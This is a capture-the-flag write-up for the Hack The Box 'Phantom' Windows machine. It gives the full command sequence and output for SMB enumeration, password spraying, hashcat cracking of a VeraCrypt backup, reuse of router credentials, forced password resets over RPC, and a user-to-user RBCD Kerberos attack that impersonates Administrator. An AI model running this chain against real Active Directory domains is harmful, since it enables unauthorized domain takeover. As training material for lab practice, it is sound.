> For the complete documentation index, see [llms.txt](https://www.adroxz.foo/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.adroxz.foo/hackthebox-and-writeups/phantom.md).

# Phantom

Phantom is a medium-difficulty Windows machine that requires extracting credentials from a leaked PDF and a VeraCrypt-encrypted router backup to gain initial access. Privilege escalation highlights an

<figure><img src="https://228349275-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDwo0QXoFAyplFtxgehnM%2Fuploads%2FIBlhtZ8RRUxOO2F0Tv1M%2Fimage.png?alt=media&amp;token=a75f35ec-f767-434b-bf12-f33249926a58" alt=""><figcaption></figcaption></figure>

### Enumeration

#### Nmap

We start things off with an nmap scan. The output displays that the target is a domain controller with the domain name of `phantom.vl`, and the actual machine name is `DC`.

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nmap 10.129.234.63 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-05 06:48 CST
Nmap scan report for 10.129.234.63
Host is up (0.075s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-05 12:48:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2026-03-04T12:46:35
|_Not valid after:  2026-09-03T12:46:35
| rdp-ntlm-info: 
|   Target_Name: PHANTOM
|   NetBIOS_Domain_Name: PHANTOM
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: phantom.vl
|   DNS_Computer_Name: DC.phantom.vl
|   DNS_Tree_Name: phantom.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-05T12:48:38+00:00
|_ssl-date: 2026-03-05T12:49:18+00:00; 0s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-03-05T12:48:43
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

#### SMB Enumeration

A publicly accessible SMB share is always worth enumerating, especially if no other significant vector is available. We will use NetExec to verify our guest user access level. The `Public` share is readable by the guest user.

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nxc smb 10.129.234.63 -u guest -p '' --shares
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [+] phantom.vl\guest: 
SMB         10.129.234.63   445    DC               [*] Enumerated shares
SMB         10.129.234.63   445    DC               Share           Permissions     Remark
SMB         10.129.234.63   445    DC               -----           -----------     ------
SMB         10.129.234.63   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.63   445    DC               C$                              Default share
SMB         10.129.234.63   445    DC               Departments Share                 
SMB         10.129.234.63   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.63   445    DC               NETLOGON                        Logon server share 
SMB         10.129.234.63   445    DC               Public          READ            
SMB         10.129.234.63   445    DC               SYSVOL                          Logon server share 
```

We access the `Public` share and enumerate its contents.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $smbclient \\\\10.129.234.63\\Public -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 10:03:14 2024
  ..                                DHS        0  Thu Aug 14 06:55:49 2025
  tech_support_email.eml              A    14565  Sat Jul  6 11:08:43 2024
```

Reading the email shows that a PDF has been sent. This PDF is included in the email but encoded with Base64.

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $cat tech_support_email.eml 
Content-Type: multipart/mixed; boundary="===============6932979162079994354=="
MIME-Version: 1.0
From: alucas@phantom.vl
To: techsupport@phantom.vl
Date: Sat, 06 Jul 2024 12:02:39 -0000
Subject: New Welcome Email Template for New Employees

--===============6932979162079994354==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit


Dear Tech Support Team,

I have finished the new welcome email template for onboarding new employees.

Please find attached the example template. Kindly start using this template for all new employees.

Best regards,
Anthony Lucas
    
--===============6932979162079994354==
Content-Type: application/pdf
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="welcome_template.pdf"

JVBERi0xLjcKJcOkw7zDtsOfCjIgMCBvYmoKPDwvTGVuZ3RoIDMgMCBSL0ZpbHRlci9GbGF0ZURl
Y29kZT4+CnN0cmVhbQp4nI1Vy4rcMBC8+yt0zsFTXZYsGcyAJY8h
...SNIP...
Y0NoZWNrc3VtIC8wQTM4N0RBQjYxNTBCMkRCMTg0MzJGMDJENzY2MDQxMwo+PgpzdGFydHhyZWYK
OTQxNAolJUVPRgo=

--===============6932979162079994354==--
```

To decode it, we echo the Base64 content into a PDF file. After opening the PDF, we find a welcome template with the default password: `Ph4nt0m@5t4rt!`.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nano eml64encoded.b64
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $base64 -d eml64encoded.b64 > welcome_template.pdf
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $file welcome_template.pdf
welcome_template.pdf: PDF document, version 1.7, 1 pages
```

<figure><img src="https://228349275-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDwo0QXoFAyplFtxgehnM%2Fuploads%2FrW5a3wlD5WHMRJS4NpMW%2Fimage.png?alt=media&amp;token=50fcf3d5-4a97-4840-b84c-fe7e1f161585" alt=""><figcaption></figcaption></figure>

Since we have guest access to the SMB share, we can enumerate users' RIDs, to get usernames to spray password with

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nxc smb 10.129.234.63 -u guest -p '' --rid-brute
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [+] phantom.vl\guest: 
SMB         10.129.234.63   445    DC               498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.63   445    DC               500: PHANTOM\Administrator (SidTypeUser)
SMB         10.129.234.63   445    DC               501: PHANTOM\Guest (SidTypeUser)
SMB         10.129.234.63   445    DC               502: PHANTOM\krbtgt (SidTypeUser)
SMB         10.129.234.63   445    DC               512: PHANTOM\Domain Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               513: PHANTOM\Domain Users (SidTypeGroup)
SMB         10.129.234.63   445    DC               514: PHANTOM\Domain Guests (SidTypeGroup)
SMB         10.129.234.63   445    DC               515: PHANTOM\Domain Computers (SidTypeGroup)
SMB         10.129.234.63   445    DC               516: PHANTOM\Domain Controllers (SidTypeGroup)
SMB         10.129.234.63   445    DC               517: PHANTOM\Cert Publishers (SidTypeAlias)
SMB         10.129.234.63   445    DC               518: PHANTOM\Schema Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               519: PHANTOM\Enterprise Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               520: PHANTOM\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.234.63   445    DC               521: PHANTOM\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.234.63   445    DC               522: PHANTOM\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.234.63   445    DC               525: PHANTOM\Protected Users (SidTypeGroup)
SMB         10.129.234.63   445    DC               526: PHANTOM\Key Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               527: PHANTOM\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               553: PHANTOM\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.234.63   445    DC               571: PHANTOM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.63   445    DC               572: PHANTOM\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.234.63   445    DC               1000: PHANTOM\DC$ (SidTypeUser)
SMB         10.129.234.63   445    DC               1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB         10.129.234.63   445    DC               1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.234.63   445    DC               1103: PHANTOM\svc_sspr (SidTypeUser)
SMB         10.129.234.63   445    DC               1104: PHANTOM\TechSupports (SidTypeGroup)
SMB         10.129.234.63   445    DC               1105: PHANTOM\Server Admins (SidTypeGroup)
SMB         10.129.234.63   445    DC               1106: PHANTOM\ICT Security (SidTypeGroup)
SMB         10.129.234.63   445    DC               1107: PHANTOM\DevOps (SidTypeGroup)
SMB         10.129.234.63   445    DC               1108: PHANTOM\Accountants (SidTypeGroup)
SMB         10.129.234.63   445    DC               1109: PHANTOM\FinManagers (SidTypeGroup)
SMB         10.129.234.63   445    DC               1110: PHANTOM\EmployeeRelations (SidTypeGroup)
SMB         10.129.234.63   445    DC               1111: PHANTOM\HRManagers (SidTypeGroup)
SMB         10.129.234.63   445    DC               1112: PHANTOM\rnichols (SidTypeUser)
SMB         10.129.234.63   445    DC               1113: PHANTOM\pharrison (SidTypeUser)
SMB         10.129.234.63   445    DC               1114: PHANTOM\wsilva (SidTypeUser)
SMB         10.129.234.63   445    DC               1115: PHANTOM\elynch (SidTypeUser)
SMB         10.129.234.63   445    DC               1116: PHANTOM\nhamilton (SidTypeUser)
SMB         10.129.234.63   445    DC               1117: PHANTOM\lstanley (SidTypeUser)
SMB         10.129.234.63   445    DC               1118: PHANTOM\bbarnes (SidTypeUser)
SMB         10.129.234.63   445    DC               1119: PHANTOM\cjones (SidTypeUser)
SMB         10.129.234.63   445    DC               1120: PHANTOM\agarcia (SidTypeUser)
SMB         10.129.234.63   445    DC               1121: PHANTOM\ppayne (SidTypeUser)
SMB         10.129.234.63   445    DC               1122: PHANTOM\ibryant (SidTypeUser)
SMB         10.129.234.63   445    DC               1123: PHANTOM\ssteward (SidTypeUser)
SMB         10.129.234.63   445    DC               1124: PHANTOM\wstewart (SidTypeUser)
SMB         10.129.234.63   445    DC               1125: PHANTOM\vhoward (SidTypeUser)
SMB         10.129.234.63   445    DC               1126: PHANTOM\crose (SidTypeUser)
SMB         10.129.234.63   445    DC               1127: PHANTOM\twright (SidTypeUser)
SMB         10.129.234.63   445    DC               1128: PHANTOM\fhanson (SidTypeUser)
SMB         10.129.234.63   445    DC               1129: PHANTOM\cferguson (SidTypeUser)
SMB         10.129.234.63   445    DC               1130: PHANTOM\alucas (SidTypeUser)
SMB         10.129.234.63   445    DC               1131: PHANTOM\ebryant (SidTypeUser)
SMB         10.129.234.63   445    DC               1132: PHANTOM\vlynch (SidTypeUser)
SMB         10.129.234.63   445    DC               1133: PHANTOM\ghall (SidTypeUser)
SMB         10.129.234.63   445    DC               1134: PHANTOM\ssimpson (SidTypeUser)
SMB         10.129.234.63   445    DC               1135: PHANTOM\ccooper (SidTypeUser)
SMB         10.129.234.63   445    DC               1136: PHANTOM\vcunningham (SidTypeUser)
SMB         10.129.234.63   445    DC               1137: PHANTOM\SSPR Service (SidTypeGroup)
```

***

### Initial Access

With a valid password, we can attempt the password spray again and see if we get any hits this time.

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nxc smb 10.129.234.63 -u users.txt -p 'Ph4nt0m@5t4rt!'
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [-] phantom.vl\Administrator:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\Guest:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\krbtgt:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\svc_sspr:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\rnichols:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\pharrison:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\wsilva:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\elynch:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\nhamilton:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\lstanley:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\bbarnes:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\cjones:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\agarcia:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\ppayne:Ph4nt0m@5t4rt! STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
```

We found a valid domain user who is not a guest account. Using these credentials, we go back to the SMB shares. The share contains multiple directories, and navigating to `IT\Backup`, we find a VeraCrypt backup container.

```bash
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.129.234.63\\'Departments share' -U ibryant%Ph4nt0m@5t4rt!

smb: \> ls
  .                                   D        0  Sat Jul  6 12:25:31 2024
  ..                                DHS        0  Thu Aug 14 07:55:49 2025
  Finance                             D        0  Sat Jul  6 12:25:11 2024
  HR                                  D        0  Sat Jul  6 12:21:31 2024
  IT                                  D        0  Thu Jul 11 10:59:02 2024


smb: \> cd IT

smb: \IT\> ls
  .                                   D        0  Thu Jul 11 10:59:02 2024
  ..                                  D        0  Sat Jul  6 12:25:31 2024
  Backup                              D        0  Sat Jul  6 14:04:34 2024
  mRemoteNG-Installer-1.76.20.24615.msi      A 43593728  Sat Jul  6 12:14:26 2024
  TeamViewerQS_x64.exe                A 32498992  Sat Jul  6 12:26:59 2024
  TeamViewer_Setup_x64.exe            A 80383920  Sat Jul  6 12:27:15 2024
  veracrypt-1.26.7-Ubuntu-22.04-amd64.deb      A  9201076  Sun Oct  1 16:30:37 2023
  Wireshark-4.2.5-x64.exe             A 86489296  Sat Jul  6 12:14:08 2024

smb: \IT\> cd Backup

smb: \IT\Backup\> ls
  .                                   D        0  Sat Jul  6 14:04:34 2024
  ..                                  D        0  Thu Jul 11 10:59:02 2024
  IT_BACKUP_201123.hc                 A 12582912  Sat Jul  6 14:04:14 2024
```

We generate a wordlist based on the details we know (Company name, and year with mutations).

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $cat phantom3.txt
Phantom2023!
Phantom2023@
Phantom2023#
Phantom2023$
phantom2023!
phantom2023@
phantom2023#
phantom2023$
Ph4nt0m2023!
Ph4nt0m2023@
Ph4nt0m2023#
Ph4nt0m2023$
Phantom23!
Phantom23@
phantom23!
phantom23@
Ph4nt0m23!
Ph4nt0m23@
Phantom!2023
Phantom@2023
Ph4nt0m!2023
Ph4nt0m@2023
Ph4nt0m@2023!
Phantom2024!
Phantom2024@
Phantom2024#
Phantom2024$
phantom2024!
phantom2024@
phantom2024#
phantom2024$
Ph4nt0m2024!
Ph4nt0m2024@
Ph4nt0m2024#
Ph4nt0m2024$
Phantom24!
Phantom24@
phantom24!
phantom24@
Ph4nt0m24!
Ph4nt0m24@
Phantom!2024
Phantom@2024
Ph4nt0m!2024
Ph4nt0m@2024
Ph4nt0m@2024!

```

Using this wordlist, we perform password cracking using Hashcat in mode 13721 for VeraCrypt.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $hashcat -m 13721 IT_BACKUP_201123.hc phantom3.txt
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: phantom3.txt
* Passwords.: 46
* Bytes.....: 576
* Keyspace..: 46 

IT_BACKUP_201123.hc:Phantom2023!                          
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Thu Mar  5 08:43:08 2026 (2 secs)
Time.Estimated...: Thu Mar  5 08:43:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (phantom3.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:       36 H/s (0.59ms) @ Accel:512 Loops:500 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 46/46 (100.00%)
Rejected.........: 0/46 (0.00%)
Restore.Point....: 0/46 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:499500-499999
Candidate.Engine.: Device Generator
Candidates.#2....: Phantom2023! -> Ph4nt0m@2024!

Started: Thu Mar  5 08:42:52 2026
Stopped: Thu Mar  5 08:43:11 2026
```

With the password `Phantom2023!`, we can mount the backup volume and explore the contents.

```bash
┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $sudo cryptsetup open --type tcrypt IT_BACKUP_201123.hc backup_volume
Enter passphrase for IT_BACKUP_201123.hc: 

┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $sudo mount /dev/mapper/backup_volume /mnt/phantom_backup

┌─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $cd /mnt/phantom_backup
ls -la
total 11196
drwxr-xr-x 4 root root   16384 Dec 31  1969  .
drwxr-xr-x 3 root root    4096 Mar  5 08:47  ..
drwxr-xr-x 2 root root    1024 Jul  6  2024 '$RECYCLE.BIN'
-rwxr-xr-x 1 root root   47391 Jul  6  2024  azure_vms_0805.json
-rwxr-xr-x 1 root root   47391 Jul  6  2024  azure_vms_1023.json
-rwxr-xr-x 1 root root   47391 Jul  6  2024  azure_vms_1104.json
-rwxr-xr-x 1 root root   47391 Jul  6  2024  azure_vms_1123.json
-rwxr-xr-x 1 root root 1012407 Jul  6  2024  splunk_logs_1003
-rwxr-xr-x 1 root root 1012407 Jul  6  2024  splunk_logs_1102
-rwxr-xr-x 1 root root 1012407 Jul  6  2024  splunk_logs1203
drwxr-xr-x 2 root root    1024 Jul  6  2024 'System Volume Information'
-rwxr-xr-x 1 root root   19348 Jul  6  2024  ticketing_system_backup.zip
-rwxr-xr-x 1 root root 8191211 Jul  6  2024  vyos_backup.tar.gz
```

***

### Lateral Movement

Extracting the `vyos_backup.tar.gz` archive gives us the internal filesystem of the VyOS router. Checking the `vyos` user's `.bash_history` revealed that the administrator had recently configured an SSTP VPN and struggled to create a system backup.

```bash
┌─[root@htb-l3ofcsraae]─[/home/adroxz/phantom/home/vyos]
└──╼ #ls -la
total 76
drwxr-xr-x 3 adroxz adroxz  4096 Jul  6  2024 .
drwxr-xr-x 4 adroxz adroxz  4096 Jul  6  2024 ..
-rw------- 1 adroxz adroxz 48257 Jul  6  2024 .bash_history
-rw-r--r-- 1 adroxz adroxz   220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 adroxz adroxz  4072 Sep 10  2023 .bashrc
-rw------- 1 adroxz adroxz    20 Jul  6  2024 .lesshst
-rw-r--r-- 1 adroxz adroxz   675 Sep 10  2023 .profile
drwxr-xr-x 2 adroxz adroxz  4096 Jul  6  2024 .ssh
-rw-r--r-- 1 adroxz adroxz     0 Jul  6  2024 .sudo_as_admin_successful
┌─[root@htb-l3ofcsraae]─[/home/adroxz/phantom/home/vyos]
└──╼ #cat .bash_history 

set interfaces ethernet eth0 description 'OUTSIDE'
#1720285380
show interfaces 
#1720285397
set firewall global-options state-policy established action accept
#1720285397
set firewall global-options state-policy related action accept
#1720285398
set firewall global-options state-policy invalid action drop
...SNIP...
```

Checking the `vyos` user's `.bash_history` revealed that the administrator had recently configured an SSTP VPN and struggled to create a system backup.

```bash
# We can see the admin navigating to the VyOS config file:
cd /opt/vyatta/etc/config
cat config.boot 

# They configured an SSTP VPN with local authentication:
set vpn sstp authentication mode 'local'
set vpn sstp client-ip-pool SSTP-POOL range '10.0.0.2-10.0.0.100'

# After several failed 'dd' attempts, they finally created a file-level backup using tar and exfiltrated it via scp:
sudo tar --exclude=/proc --exclude=/boot --exclude=/usr --exclude=/sys --exclude=/dev --exclude=/tmp/system_backup.tar.gz -cvpzf /tmp/system_backup.tar.gz /
scp /tmp/system_backup.tar.gz arshia@192.168.1.25:.
```

This history log was the missing link. It told me exactly where the `config.boot` file was located, confirmed that an SSTP VPN was running, and explained the origin of the `system_backup.tar.gz` file I extracted earlier.

By extracting and analyzing the VyOS `config.boot` file from the backup archive, I was able to review the router's running configuration. I immediately hunted for the `system` and `vpn` blocks to see how access was being managed.

```bash
# Extracted from /opt/vyatta/etc/config/config.boot

system {
    login {
        user admin {
            authentication {
                encrypted-password "$6$rounds=656000$6diBtlKOC2mmpMcP$G.DyFWB..."
            }
        }
        user vyos {
            authentication {
                encrypted-password "$6$rounds=656000$Etl2frgw6IuOffzT$LPX5Djr..."
            }
        }
    }
}

vpn {
    sstp {
        authentication {
            local-users {
                username lstanley {
                    password "gB6XTcqVP5MlP7Rc"
                }
            }
        }
        client-ip-pool SSTP-POOL {
            range "10.0.0.2-10.0.0.100"
		  }
        gateway-address "10.0.0.1"
    }
}
```

This configuration file yielded massive results. I extracted the SHA-512 hashes for both the `admin` and `vyos` users to crack offline if needed. More importantly, I found a set of plaintext credentials for the user `lstanley`, along with the knowledge that the internal VPN network operates on the `10.0.0.x` subnet. With these credentials, I could bypass hash cracking entirely and attempt to tunnel straight into the internal network

We find a set of credentials for the `lstanley` user. We attempt a password spray with the newly found password and see that we can reuse the credentials. It seems that we have a valid hit for the `svc_sspr` user.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $nxc smb 10.129.234.63 -u users.txt -p 'gB6XTcqVP5MlP7Rc'
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [-] phantom.vl\Administrator:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\Guest:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [-] phantom.vl\krbtgt:gB6XTcqVP5MlP7Rc STATUS_LOGON_FAILURE 
SMB         10.129.234.63   445    DC               [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
```

We check if we can authenticate with WinRM. Once connected, we can retrieve the user flag.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $evil-winrm -i 10.129.234.63 -u svc_sspr -p gB6XTcqVP5MlP7Rc

*Evil-WinRM* PS C:\Users\svc_sspr\Documents> type ../Desktop/user.txt
d814xxxxxxxxxxxxxxxxedc8f
```

### Privilege Escalation

Analysis of BloodHound data shows that `svc_sspr` has `ForceChangePassword` over the users `crose`, `wsilva`, and `rnichols`. Further analysis shows that `wsilva` is a member of the ICT Security group and can modify the `msds-AllowedToActOnBehalfOfOtherIdentity` attribute on the `DC.phantom.vl` computer object. This indicates that we can perform an RBCD (Resource-Based Constrained Delegation) attack from the `wsilva` user account.<br>

<figure><img src="https://228349275-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDwo0QXoFAyplFtxgehnM%2Fuploads%2FMsNIwJ0gh6ZNyyUL9yi4%2Fimage.png?alt=media&amp;token=0d43e343-d6a8-4f45-ae8f-64033e2cb057" alt=""><figcaption></figcaption></figure>

We begin by changing the passwords for our target users via RPC.

```bash
┌─[✗]─[adroxz@htb-l3ofcsraae]─[~]
└──╼ $rpcclient -U "phantom.vl/svc_sspr%gB6XTcqVP5MlP7Rc" 10.129.234.63
rpcclient $> setuserinfo2 wsilva 24 'Pwned123!'
```

```bash
┌─[adroxz@htb-l3ofcsraae]─[~/phntm]
└──╼ $nxc smb 10.129.234.63 -u wsilva -p 'Pwned123!'
SMB         10.129.234.63   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.63   445    DC               [+] phantom.vl\crose:Pwned123! 

```

Since the MachineAccountQuota is set to 0, we cannot create computer objects, so the standard RBCD attack will not work. We'll have to use an unusual way to execute RBCD, using a user account

**Standard Resource-Based Constrained Delegation (RBCD) attacks typically rely on the attacker creating a new computer account in Active Directory to act as the delegate. However, when the domain's `MachineAccountQuota` is set to `0`, creating computer objects is impossible, rendering the standard attack path ineffective.**\
**To bypass this restriction, we can abuse RBCD using a standard, non-machine user account instead. Because regular user accounts lack the Service Principal Names (SPNs) required for standard Kerberos delegation flows, we must leverage a User-to-User (U2U) authentication flow. This advanced technique involves extracting the Kerberos Ticket Session Key from the compromised user's TGT and temporarily replacing their actual NTLM hash with this session key. This tricks the Key Distribution Center (KDC) into accepting the authentication, allowing us to perform S4U2Self and S4U2Proxy flows to successfully forge a Service Ticket as a Domain Admin.**

First, we must obtain write permissions over the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the `DC.phantom.vl` machine account. We delegate write permissions to the computer object.

```bash
┌──(kali㉿kali)-[~]
└─$ impacket-rbcd \
-delegate-to DC$ \
-delegate-from wsilva \
-action write \
phantom.vl/wsilva:'Pwned123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     svc_sspr     (S-1-5-21-4029599044-1972224926-2225194048-1103)
[*]     DC$          (S-1-5-21-4029599044-1972224926-2225194048-1000)
[*] Delegation rights modified successfully!
[*] wsilva can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     svc_sspr     (S-1-5-21-4029599044-1972224926-2225194048-1103)
[*]     DC$          (S-1-5-21-4029599044-1972224926-2225194048-1000)
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)
```

To begin with RBCD exploitation, we sync our time with the target.

```bash
┌──(kali㉿kali)-[~]
└─$ timedatectl set-ntp off

┌──(kali㉿kali)-[~]
└─$ sudo ntpdate phantom.vl
[sudo] password for kali: 
2026-03-05 15:39:06.174329 (-0500) +0.380576 +/- 0.141864 phantom.vl 10.129.234.63 s1 no-leap
```

We then need to get a TGT for `wsilva` and extract the session key value.

```bash
┌──(kali㉿kali)-[~]
└─$ impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.129.234.63' -action 'write' 'phantom.vl'/'wsilva':'Pwned123!'

[*] Accounts allowed to act on behalf of other identity:
[*]     svc_sspr     (S-1-5-21-4029599044-1972224926-2225194048-1103)
[*]     DC$          (S-1-5-21-4029599044-1972224926-2225194048-1000)
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)
[*] wsilva can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     svc_sspr     (S-1-5-21-4029599044-1972224926-2225194048-1103)
[*]     DC$          (S-1-5-21-4029599044-1972224926-2225194048-1000)
[*]     wsilva       (S-1-5-21-4029599044-1972224926-2225194048-1114)

┌──(kali㉿kali)-[~]
└─$ NTLM=$(echo -n 'Pwned123!' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 | awk '{print $2}')

┌──(kali㉿kali)-[~]
└─$ impacket-getTGT -hashes :$NTLM 'phantom.vl'/'wsilva' 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in wsilva.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=wsilva.ccache

┌──(kali㉿kali)-[~]
└─$ impacket-describeTicket wsilva.ccache | grep 'Ticket Session Key' 
[*] Ticket Session Key            : b163d04c52cc2d88cc59ce6a9078b228
```

For the attack to be successful, we need to set the session key as `wsilva`'s new NTLM hash.

```bash
┌──(kali㉿kali)-[~]
└─$ impacket-changepasswd \
-newhashes :b163d04c52cc2d88cc59ce6a9078b228 \
phantom.vl/wsilva:'Pwned123!'@DC.phantom.vl
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Changing the password of phantom.vl\wsilva
[*] Connecting to DCE/RPC as phantom.vl\wsilva
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
```

After that, we can perform S4U2Self + U2U + S4U2Proxy flows to get a service ticket to the target as the domain admin.

```bash
┌──(kali㉿kali)-[~]
└─$ impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva' 

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache

